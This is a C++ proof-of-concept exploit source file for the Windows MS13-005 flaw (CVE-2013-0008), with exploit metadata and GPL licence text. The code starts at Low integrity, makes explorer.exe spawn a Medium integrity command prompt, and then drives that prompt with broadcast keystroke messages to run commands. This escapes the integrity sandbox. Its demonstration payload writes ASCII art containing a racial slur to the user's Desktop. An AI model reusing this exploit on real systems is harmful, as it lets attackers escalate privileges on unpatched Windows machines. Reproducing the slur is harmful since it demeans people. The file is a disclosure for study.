/* ms13-005-funz-poc.cpp - Drive a Medium IL cmd.exe via a Low IL process and message broadcasted Copyright (C) 2013 Axel "0vercl0k" Souchet - http://www.twitter.com/0vercl0k This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. @taviso did all the job, I just followed its blogpost: -> http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html -- amazing. Cool trick: -> If you want to set this process to a low IL you can use: icacls ms13-005-funz-poc.exe /setintegritylevel L -> The new ms13-005-funz-poc.exe will be now launched as low IL (you can check it with process explorer) # Exploit Title: ms13-005-funz-poc.cpp # Date: 2013-02-05 # Exploit Author: 0vercl0k - https://twitter.com/0vercl0k # Vendor Homepage: https://www.microsoft.com/ # Version: Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 r2, Windows 8, Windows Server 2012, Windows RT (See http://technet.microsoft.com/fr-fr/security/bulletin/ms13-005) # Tested on: Windows 7 # CVE : CVE-2013-0008 - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0008 # Video: http://0vercl0k.tuxfamily.org/bl0g/ms13-005-funz/ms13-005-funz-poc.mp4 */ #include <windows.h> #include <stdio.h> int main() { STARTUPINFO si = {0}; PROCESS_INFORMATION pi = {0}; PCHAR payload[] = { "echo \".___ _____ ______________ ______________ \"> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \"| | / \\ \\__ ___/ | \\_ _____/ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \"| |/ \\ / \\ | | / ~ \\ __)_ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \"| / Y \\ | | \\ Y / \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \"|___\\____|__ / |____| \\___|_ /_______ / \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \" \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \" _______ .___ ________ ________ _____ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \" \\ \\ | |/ _____/ / _____/ / _ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \" / | \\| / \\ ___/ \\ ___ / /_\\ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \"/ | \\ \\ \\_\\ \\ \\_\\ \\/ | \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \"\\____|__ /___|\\______ /\\______ /\\____|__ / \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \" \\/ \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "exit", NULL }; printf("1] Spawning a low IL cmd.exe (from a low IL process)..Rdy ? Press to continue\n"); getchar(); si.cb = sizeof(si); CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi ); Sleep(1000); // Yeah, you can "bruteforce" the index of the window.. printf("2] Use Win+Shift+7 to ask explorer.exe to spawn a cmd.exe MI.."); keybd_event(VK_LWIN, 0x5B, 0, 0); keybd_event(VK_LSHIFT, 0xAA, 0, 0); keybd_event(0x37, 0x87, 0, 0); keybd_event(VK_LWIN, 0x5B, KEYEVENTF_KEYUP, 0); keybd_event(VK_LSHIFT, 0xAA, KEYEVENTF_KEYUP, 0); keybd_event(0x37, 0x87, KEYEVENTF_KEYUP, 0); Sleep(1000); printf("3] Killing now the useless low IL cmd.exe..\n"); TerminateProcess( pi.hProcess, 1337 ); printf("4] Now driving the medium IL cmd.exe with SendMessage and HWND_BROADCAST (WM_CHAR)\n"); printf(" \"Drive the command prompt [..] to make it look like a scene from a Hollywood movie.\" <- That's what we're going to do!\n"); for(unsigned int i = 0; payload[i] != NULL; ++i) { for(unsigned int j = 0; j < strlen(payload[i]); ++j) { // Yeah, that's the fun part to watch ;D Sleep(10); SendMessage( HWND_BROADCAST, WM_CHAR, payload[i][j], 0 ); } SendMessage( HWND_BROADCAST, WM_CHAR, VK_RETURN, 0 ); } return EXIT_SUCCESS; }